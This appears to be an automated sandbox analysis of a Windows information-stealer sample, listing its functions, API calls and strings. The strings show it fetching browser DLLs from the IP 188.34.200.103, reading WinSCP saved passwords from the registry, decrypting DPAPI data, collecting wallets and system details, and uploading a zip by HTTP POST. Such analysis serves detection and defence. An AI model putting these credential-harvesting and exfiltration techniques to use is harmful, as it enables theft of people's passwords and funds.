Opcode Fuzzy Hash: e6300e65373c509f9a1ce3e25db0ab6e4eb333436d24830e87314ae1f7d07127
Instruction Fuzzy Hash: F18138B2900218AFDB10DFA6DD85DAEBBB9FB08314F14053EE415E72A1E7359941CF19

Uniqueness

Uniqueness Score: -1.00%

Function 0040A24D, Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 156fileCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040A26C
_sprintf.LIBCMT ref: 0040A29D
FindFirstFileA.KERNELBASE(?,00000000,?,?,00000014), ref: 0040A2B0
_sprintf.LIBCMT ref: 0040A300

Part of subcall function 00468A5A: __output_l.LIBCMT ref: 00468AB5

_sprintf.LIBCMT ref: 0040A329

Part of subcall function 00468A5A: __flsbuf.LIBCMT ref: 00468AD0

_sprintf.LIBCMT ref: 0040A338
PathMatchSpecA.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000014), ref: 0040A347
CopyFileA.KERNEL32 ref: 0040A3CB
FindNextFileA.KERNELBASE(?,00000000,?,?,00000014), ref: 0040A42D
FindClose.KERNEL32(?,?,?,00000014), ref: 0040A43E

Strings

%s\*, xrefs: 0040A297
%s\%s, xrefs: 0040A2F3, 0040A2FE, 0040A336

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _sprintf$FileFind$CloseCopyFirstH_prolog3MatchNextPathSpec__flsbuf__output_l
String ID: %s\%s$%s\*
API String ID: 2813418133-2848263008
Opcode ID: de037707581fe692d91e8bce40474dc4f58db580f42c28e03cf008f803adf814
Instruction ID: 82f9decad04bab4e917dc4f009f5a493f308f6b76628a3e7d9caddb8bf6fc6a4
Opcode Fuzzy Hash: de037707581fe692d91e8bce40474dc4f58db580f42c28e03cf008f803adf814
Instruction Fuzzy Hash: CB513171900249EFDF21EFA5CC45BDE7768FB08305F10452BFA09A6281EB7997148B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B048, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116networkfileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0040B052
DeleteUrlCacheEntry.WININET(?), ref: 0040B082
DeleteUrlCacheEntry.WININET(00000000), ref: 0040B0A4
InternetOpenA.WININET(004866C4,00000000,00000000,00000000,00000000), ref: 0040B0BD
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,04800000,00000000), ref: 0040B0F4
HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,04800000,00000000), ref: 0040B118
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040B129
InternetReadFile.WININET(00000000,?,000007FF,?), ref: 0040B147
InternetCloseHandle.WININET(00000000), ref: 0040B15B
InternetCloseHandle.WININET(00000000), ref: 0040B162
InternetCloseHandle.WININET(?), ref: 0040B16E

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Strings

GET, xrefs: 0040B112

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CloseHandle$CacheDeleteEntryHttpOpenRequest$ConnectFileH_prolog3_ReadSend_memmove
String ID: GET
API String ID: 893606432-1805413626
Opcode ID: 5a534b22061ef68b816d191cc9b21efa78b250d9decc7942754fe87cdec22290
Instruction ID: c3b1abcb992c8b5f7654b5be7816c1f133f65e6308372d0235e69025ea005b8c
Opcode Fuzzy Hash: 5a534b22061ef68b816d191cc9b21efa78b250d9decc7942754fe87cdec22290
Instruction Fuzzy Hash: A24149B1500118AFEB10EF65CC84AAE77ACFF44344F0485BAF805A7190DB749E84CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00412D96, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 161fileCOMMON

Download Yara Rule

APIs

_sprintf.LIBCMT ref: 00412DEC
FindFirstFileA.KERNEL32(?,?), ref: 00412DFF
_sprintf.LIBCMT ref: 00412E50

Part of subcall function 00468A5A: __output_l.LIBCMT ref: 00468AB5

Part of subcall function 004125BF: __EH_prolog3.LIBCMT ref: 004125DE
Part of subcall function 004125BF: GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 0041260D
Part of subcall function 004125BF: lstrcatA.KERNEL32(?,\temp), ref: 0041261C
Part of subcall function 004125BF: CopyFileA.KERNEL32 ref: 00412629

Part of subcall function 0040EEA6: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040EEE6
Part of subcall function 0040EEA6: lstrcatA.KERNEL32(?,\temp), ref: 0040EEF8
Part of subcall function 0040EEA6: CopyFileA.KERNEL32 ref: 0040EF08
Part of subcall function 0040EEA6: _memset.LIBCMT ref: 0040EF16
Part of subcall function 0040EEA6: _sprintf.LIBCMT ref: 0040EF28
Part of subcall function 0040EEA6: DeleteFileA.KERNEL32(?), ref: 0040EFD2

Part of subcall function 0040EFF0: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F030
Part of subcall function 0040EFF0: lstrcatA.KERNEL32(?,\temp), ref: 0040F042
Part of subcall function 0040EFF0: CopyFileA.KERNEL32 ref: 0040F052
Part of subcall function 0040EFF0: _memset.LIBCMT ref: 0040F060
Part of subcall function 0040EFF0: _sprintf.LIBCMT ref: 0040F072
Part of subcall function 0040EFF0: DeleteFileA.KERNEL32(?), ref: 0040F122

FindNextFileA.KERNELBASE(?,?), ref: 00412F65
FindClose.KERNEL32(?), ref: 00412F76

Strings

History, xrefs: 00412EB9
%s\*, xrefs: 00412DE3
%s\%s, xrefs: 00412E4A

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: File$_sprintf$CopyCurrentDirectoryFindlstrcat$Delete_memset$CloseFirstH_prolog3Next__output_l
String ID: %s\%s$%s\*$History
API String ID: 1184990043-2206966733
Opcode ID: bd8aec016a80d798792d5ff9926ea5db1f9e8c7c26ff4931919dc8fbce70856b
Instruction ID: 1aa4ff5d384db937c50f6b477bca384b4dd3e3aa4a33c3803cac2ab7634d5304
Opcode Fuzzy Hash: bd8aec016a80d798792d5ff9926ea5db1f9e8c7c26ff4931919dc8fbce70856b
Instruction Fuzzy Hash: C0512972C0024EAECF24EFA1DD44ADE77BDEB08304F10442BF518A7161EB759665DB58

Uniqueness

Uniqueness Score: -1.00%

Function 0045F961, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 114memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0045F980
GetKeyboardLayoutList.USER32(00000000,00000000,00000018), ref: 0045F9AD
LocalAlloc.KERNEL32(00000040,00000000), ref: 0045F9BC
GetKeyboardLayoutList.USER32(?,00000000), ref: 0045F9C9
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0045F9F3
_memset.LIBCMT ref: 0045FA73

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

LocalFree.KERNEL32(?), ref: 0045FA92

Strings

/ , xrefs: 0045F9FE

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
String ID: /
API String ID: 680995659-4001269591
Opcode ID: fca272049d8a64a803fa8726c3363da24dcf8324e2295ad06a9808b788d5f4ee
Instruction ID: ebc50c4569753f4ae8d6dd9b94eee5d4375e5fcf9b0d26fe206f9ec9c13f0136
Opcode Fuzzy Hash: fca272049d8a64a803fa8726c3363da24dcf8324e2295ad06a9808b788d5f4ee
Instruction Fuzzy Hash: F44141B1900209AFDB10EF95C885AEEBBB8FF58305F50442FF905E6281D7785A49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00465C58, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 462COMMON

Download Yara Rule

Strings

UT, xrefs: 00465F58

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: UT
API String ID: 0-894488996
Opcode ID: bb1724965f176ccb25a4cb9f98c62046195d56514af30cd75172c467aec00ed8
Instruction ID: 3861737f4131847f7d7681eb4d2b8830ec5397b5b8f4cdf9003779686283e3f4
Opcode Fuzzy Hash: bb1724965f176ccb25a4cb9f98c62046195d56514af30cd75172c467aec00ed8
Instruction Fuzzy Hash: ED02F170A043888BDF25DFA8C8907EE7BB5AF55304F14446FD849AF346E6388945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F881, Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040F8AE

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F8C1
CloseHandle.KERNEL32(00000000,?,0049B0CC,00000000), ref: 0040F8CE
Process32First.KERNEL32(?,?), ref: 0040F8DF
Process32Next.KERNEL32 ref: 0040F940
FindCloseChangeNotification.KERNEL32(?,?,0049B0CC,00000000), ref: 0040F94C

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseProcess32$AllocateChangeCreateFindFirstHandleHeapNextNotificationSnapshotToolhelp32_malloc
String ID:
API String ID: 2639979032-0
Opcode ID: 22f4b5f6bdae114b8d5c10163eb0ced01716915019b69af9f9be2de9c0e094e0
Instruction ID: db23c6cec75c505437726e574e49ed5c75040cd14c1b2d0783e8c8df41269829
Opcode Fuzzy Hash: 22f4b5f6bdae114b8d5c10163eb0ced01716915019b69af9f9be2de9c0e094e0
Instruction Fuzzy Hash: 5721BF719042589ADB309FB5DC81BEEBBBAFF15318F20413FD855A7282E7395909CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00442489, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 468COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004425BA
_memset.LIBCMT ref: 00442752

Strings

:memory:, xrefs: 004424D4
F@B, xrefs: 004425FA, 0044261C, 004428DF, 004428F2

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove_memset
String ID: :memory:$F@B
API String ID: 3555123492-33899371
Opcode ID: 87745c7d2c2a4e0775ccd4723815544a4bddde217433c4695f536c5b6078dbd3
Instruction ID: bf3b9ab26e30bf1c6986341982e446c835fadc4d3ba8798bcb033ebbf068b2cb
Opcode Fuzzy Hash: 87745c7d2c2a4e0775ccd4723815544a4bddde217433c4695f536c5b6078dbd3
Instruction Fuzzy Hash: F602BB70A00205DFEB25DF64CA45AAEBBB0FF54304F64416FF855AB252D7B8D980CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBCB, Relevance: 6.0, APIs: 4, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040EBEE
LocalAlloc.KERNEL32(00000040,?), ref: 0040EC06
_memmove.LIBCMT ref: 0040EC1B
LocalFree.KERNEL32(?), ref: 0040EC27

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect_memmove
String ID:
API String ID: 3008826695-0
Opcode ID: 2e21a8d27fdfff7232672f31a8928a13f293791f13c93ce0950a323e37e01a9f
Instruction ID: 533385069dfd4ee9e78909f8d5a97e7220bd51e141bcaac38ed2d7d1285ab8c0
Opcode Fuzzy Hash: 2e21a8d27fdfff7232672f31a8928a13f293791f13c93ce0950a323e37e01a9f
Instruction Fuzzy Hash: B30162B6900218AFCB00EFE9DC498DEBBB9FF48704B14486AF901E7210E7759A50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004625F7, Relevance: 4.6, APIs: 3, Instructions: 72fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00462601

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,0040CF5D,?), ref: 0046263A
FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 004626CB

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFileFindMultiWide$FirstH_prolog3_Next
String ID:
API String ID: 1519118924-0
Opcode ID: e0facc31fb44c86b85d9735f083605fe296d7d7d7841cebcfd0fe1e28310b88d
Instruction ID: 0b87ea419238332d54dcb1d30181f3322be443f13eb6f922783ccfb4c27e5f02
Opcode Fuzzy Hash: e0facc31fb44c86b85d9735f083605fe296d7d7d7841cebcfd0fe1e28310b88d
Instruction Fuzzy Hash: E9314D71D00209AFCB11DFA9C988ADEBBB8AF55304F00859FE415A7251EB789B44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 004323AD, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0049E224,00000001,0043EC1C,?,00000000,00000104), ref: 004323BD

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: da1c9d006e9c081273fb249626f3c7d2407ebdfce130c93631ec1466ca227e12
Instruction ID: aeef8d2b3daf6a536eec646ab281b3fc14bcb64341fe4a88342e86dab6776c02
Opcode Fuzzy Hash: da1c9d006e9c081273fb249626f3c7d2407ebdfce130c93631ec1466ca227e12
Instruction Fuzzy Hash: 64D0A77278020026FA147269BD07F661486C7C4F00F208C37B100951C9E6D95441C19E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3EE, Relevance: 176.7, APIs: 46, Strings: 54, Instructions: 1660COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(04301058,00000000,00000001,00000000,00000000), ref: 0040B3F8
SetCurrentDirectoryA.KERNEL32(04301058), ref: 0040B40B
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040B42D

Part of subcall function 0040DB5B: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040DB82
Part of subcall function 0040DB5B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DB9E
Part of subcall function 0040DB5B: CloseHandle.KERNEL32(00000000), ref: 0040DBA5

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 0040DA1F: _memset.LIBCMT ref: 0040DA29

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

CreateDirectoryA.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,00000001,?,00000001,?,?,?,00000001), ref: 0040B87D
CreateDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?,?,?,00000001,?,00000001), ref: 0040B8A7
CreateDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?,?,00000001), ref: 0040B8D1
CreateDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040B90B
CreateDirectoryA.KERNEL32(00000000), ref: 0040B935
CreateDirectoryA.KERNEL32(00000000), ref: 0040B967

Strings

logs, xrefs: 0040C815
/nss3.dll, xrefs: 0040B6A7
GUID: %s, xrefs: 0040BB1F
Version: %s, xrefs: 0040BA9A
\freebl3.dll, xrefs: 0040B543
Windows: , xrefs: 0040BC0E
VideoCard: , xrefs: 0040C1D0
C:\ProgramData, xrefs: 0040C8FB
\msvcp140.dll, xrefs: 0040B65D
MachineID: %s, xrefs: 0040BAE6
/softokn3.dll, xrefs: 0040B734
,, xrefs: 0040B529
Keyboard Languages: , xrefs: 0040BEBB
*, xrefs: 0040B7EA
^", xrefs: 0040B7BC
J%, xrefs: 0040B4D0
Date: %s, xrefs: 0040BABC
RAM: , xrefs: 0040C157
Path: %s , xrefs: 0040BB99
188.34.200.103, xrefs: 0040B504, 0040B595, 0040B622, 0040B6AF, 0040B73C, 0040B7C9, 0040C842, 0040C84D, 0040C852
\files\Wallets, xrefs: 0040C406
\vcruntime140.dll, xrefs: 0040B804
x#, xrefs: 0040B6A2
TimeZone: , xrefs: 0040BFAB
\files\, xrefs: 0040C420
CPU Count: , xrefs: 0040C0DF
[Software], xrefs: 0040C2B6
.zip, xrefs: 0040C704
:+, xrefs: 0040B6D0
ccount, xrefs: 0040C671
\mozglue.dll, xrefs: 0040B5D0
\files, xrefs: 0040B411, 0040C3C2, 0040C789
F, xrefs: 0040C847
/vcruntime140.dll, xrefs: 0040B7C1
Work Dir: %s , xrefs: 0040BBCD
T,, xrefs: 0040B5B6
Display Language: , xrefs: 0040BE43
Computer Name: , xrefs: 0040BCD6
Local Time: , xrefs: 0040BF33
\nss3.dll, xrefs: 0040B6EA
/mozglue.dll, xrefs: 0040B58D
/freebl3.dll, xrefs: 0040B4FC
C%, xrefs: 0040B44D
HWID: %s, xrefs: 0040BB58
[Processes], xrefs: 0040C230
files\information.txt, xrefs: 0040BA32
Display Resolution: , xrefs: 0040BDCB
/msvcp140.dll, xrefs: 0040B61A
User Name: , xrefs: 0040BD53
*.*, xrefs: 0040C77B
\softokn3.dll, xrefs: 0040B777
Processor: , xrefs: 0040C067
", xrefs: 0040B72F
[Hardware], xrefs: 0040C010

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory$File$CloseCurrentH_prolog3HandleWrite_memmove_memset
String ID: [Software]$*.*$.zip$/freebl3.dll$/mozglue.dll$/msvcp140.dll$/nss3.dll$/softokn3.dll$/vcruntime140.dll$188.34.200.103$C:\ProgramData$CPU Count: $Computer Name: $Date: %s$Display Language: $Display Resolution: $F$GUID: %s$HWID: %s$Keyboard Languages: $Local Time: $MachineID: %s$Path: %s $Processor: $RAM: $TimeZone: $User Name: $Version: %s$VideoCard: $Windows: $Work Dir: %s $[Hardware]$[Processes]$\files$\files\$\files\Wallets$\freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$ccount$files\information.txt$logs$ *$:+$C%$J%$T,$^"$x#$"$,
API String ID: 2752366107-80144197
Opcode ID: b8e21d82612c8b4727ae08f7b4a616d873e217a9f84ad5c1cedf6b7795abb49c
Instruction ID: 88b6f0bcc4ccab69488aa743f7a3b3b66addb3fa89cf5dd1017f7a6447548ab9
Opcode Fuzzy Hash: b8e21d82612c8b4727ae08f7b4a616d873e217a9f84ad5c1cedf6b7795abb49c
Instruction Fuzzy Hash: 64D23EB1804148AEEB14EB95DD89EDE7B7CEF15304F0000BEF505B71D2DA785A88DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004136A5, Relevance: 73.8, APIs: 27, Strings: 15, Instructions: 298registryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004136C4
_memset.LIBCMT ref: 004136E4
_memset.LIBCMT ref: 00413704
_memset.LIBCMT ref: 00413718
_memset.LIBCMT ref: 00413726
RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0041374C
RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 00413772
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 00413784
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 0041379A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 004137AB
RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 004137C1
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 004137E2
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 004137F8
_fprintf.LIBCMT ref: 00413851
_fprintf.LIBCMT ref: 0041385C
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,?,00000001,00000000,passwords.txt), ref: 00413881
_fprintf.LIBCMT ref: 00413890
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 004138BC
_fprintf.LIBCMT ref: 004138E4
_fprintf.LIBCMT ref: 004138FF
_fprintf.LIBCMT ref: 0041390C
RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 00413930
_fprintf.LIBCMT ref: 0041393F
RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00413971

Part of subcall function 0041322B: __EH_prolog3.LIBCMT ref: 00413244
Part of subcall function 0041322B: GetProcessHeap.KERNEL32(00000008,?,0000002C), ref: 004132B0
Part of subcall function 0041322B: HeapAlloc.KERNEL32(00000000), ref: 004132B3
Part of subcall function 0041322B: GetProcessHeap.KERNEL32(00000000,?), ref: 004132C9
Part of subcall function 0041322B: HeapFree.KERNEL32(00000000), ref: 004132CC

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

_fprintf.LIBCMT ref: 004139C3
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 004139EA
RegCloseKey.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 00413A17

Strings

Security, xrefs: 0041376A
Password: %s, xrefs: 004139BD
Login: , xrefs: 00413906
UseMasterPassword, xrefs: 00413765
UserName, xrefs: 00413921
PortNumber, xrefs: 004138A6
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 00413741
Host: , xrefs: 00413856
HostName, xrefs: 00413872
passwords.txt, xrefs: 00413805
:%s, xrefs: 004138DE
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 004137BB
Password, xrefs: 0041395F
:22, xrefs: 004138F9
Soft: WinSCP, xrefs: 0041384B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$CloseValue$Heap_memset$EnumH_prolog3OpenProcess_memmove$AllocFree
String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 2505226420-1600676177
Opcode ID: b1f439b427cf368186053285f9086994e6cee25bd7459c4094bca62913783d5c
Instruction ID: 549c353064c69772ae4d8435066ebdf221e70eb495c398f864a2d8b7e7bc5e18
Opcode Fuzzy Hash: b1f439b427cf368186053285f9086994e6cee25bd7459c4094bca62913783d5c
Instruction Fuzzy Hash: 06B13DB190420DEEDB11EF90DC81EEE77BCFF04304F14052BF915A6191EB799A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 004125BF, Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 257filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004125DE
GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 0041260D
lstrcatA.KERNEL32(?,\temp), ref: 0041261C
CopyFileA.KERNEL32 ref: 00412629
DeleteFileA.KERNEL32(?), ref: 00412897

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

Part of subcall function 00412474: __EH_prolog3_GS.LIBCMT ref: 0041247B
Part of subcall function 00412474: _memset.LIBCMT ref: 004124D6
Part of subcall function 00412474: LocalAlloc.KERNEL32 ref: 00412511

_fprintf.LIBCMT ref: 0041271F
_fprintf.LIBCMT ref: 0041272D
_fprintf.LIBCMT ref: 00412734
_fprintf.LIBCMT ref: 00412742
_fprintf.LIBCMT ref: 00412749
_fprintf.LIBCMT ref: 00412757
_fprintf.LIBCMT ref: 0041275E
_fprintf.LIBCMT ref: 004127A1
_fprintf.LIBCMT ref: 004127B3
_fprintf.LIBCMT ref: 004127C1

Part of subcall function 0046835C: __lock_file.LIBCMT ref: 004683A3
Part of subcall function 0046835C: __stbuf.LIBCMT ref: 00468427
Part of subcall function 0046835C: __output_l.LIBCMT ref: 00468437
Part of subcall function 0046835C: __ftbuf.LIBCMT ref: 00468441

_fprintf.LIBCMT ref: 004127C8
_fprintf.LIBCMT ref: 004127D6
_fprintf.LIBCMT ref: 004127DD
_fprintf.LIBCMT ref: 004127EB
_fprintf.LIBCMT ref: 004127F2
_fprintf.LIBCMT ref: 00412835
_fprintf.LIBCMT ref: 0041284F

Strings

\temp, xrefs: 00412613
Password: %s, xrefs: 0041279B, 0041282F
Soft: %s, xrefs: 00412727, 004127BB
Host: %s, xrefs: 0041273C, 004127D0
Login: %s, xrefs: 00412751, 004127E5

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryH_prolog3H_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
String ID: Host: %s$Login: %s$Password: %s$Soft: %s$\temp
API String ID: 742969294-2676079308
Opcode ID: 9b8e54e3261377f01fd947e897685e197660b70fac05e2d73e00e043c6c5702f
Instruction ID: d9dc442428994d9dd436ba45e4c568b9849aac67de50ca6e8163ccbd64d1daf8
Opcode Fuzzy Hash: 9b8e54e3261377f01fd947e897685e197660b70fac05e2d73e00e043c6c5702f
Instruction Fuzzy Hash: E6817072900218AFDF05BBA19D02EEF7768EF04718F54052EF900B6292EE795D51876E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E48C, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 277networkCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040E4AB
__cftof.LIBCMT ref: 0040E56D
InternetOpenA.WININET(0000002F,00000000,?,00000000,00000000), ref: 0040E588
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 0040E5AB
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 0040E5CC
InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 0040E5E5
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00400000,00000001), ref: 0040E608
HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040E662
__itow_s.LIBCMT ref: 0040E676
HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040E6C5
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0040E6D3
HttpQueryInfoA.WININET(00000000,0000002E,?,00000010,00000000), ref: 0040E6F0
InternetCloseHandle.WININET(00000000), ref: 0040E6FB
__cftof.LIBCMT ref: 0040E727

Part of subcall function 0046910A: __mbsnbcpy_s_l.LIBCMT ref: 0046911D

InternetOpenUrlA.WININET(00000010,00000000,00000000,00000000,00400000,00000000), ref: 0040E73B
InternetCloseHandle.WININET(00000000), ref: 0040E750
InternetCloseHandle.WININET(?), ref: 0040E768
InternetCloseHandle.WININET(00000010), ref: 0040E771

Part of subcall function 0040DDDE: __EH_prolog3.LIBCMT ref: 0040DDFD
Part of subcall function 0040DDDE: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040DE37
Part of subcall function 0040DDDE: InternetReadFile.WININET(00000010,?,000003E8,?), ref: 0040DE51
Part of subcall function 0040DDDE: _memmove.LIBCMT ref: 0040DE86
Part of subcall function 0040DDDE: _memset.LIBCMT ref: 0040DEB7
Part of subcall function 0040DDDE: HttpQueryInfoA.WININET(00000010,0000001D,?,?,00000000), ref: 0040DECD

Strings

Content-Type: multipart/form-data; boundary=, xrefs: 0040E622
Content-Length: , xrefs: 0040E680
http, xrefs: 0040E70B
POST, xrefs: 0040E602
--, xrefs: 0040E4E8
http://, xrefs: 0040E50B

Memory Dump Source

Source File: 0000001F.00000002.481743680.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$Http$CloseHandleRequest$Open$FileH_prolog3HeadersInfoOptionQuery__cftof$ConnectPointerReadSend__itow_s__mbsnbcpy_s_l_memmove_memset
String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
API String ID: 3912242280-1095625359
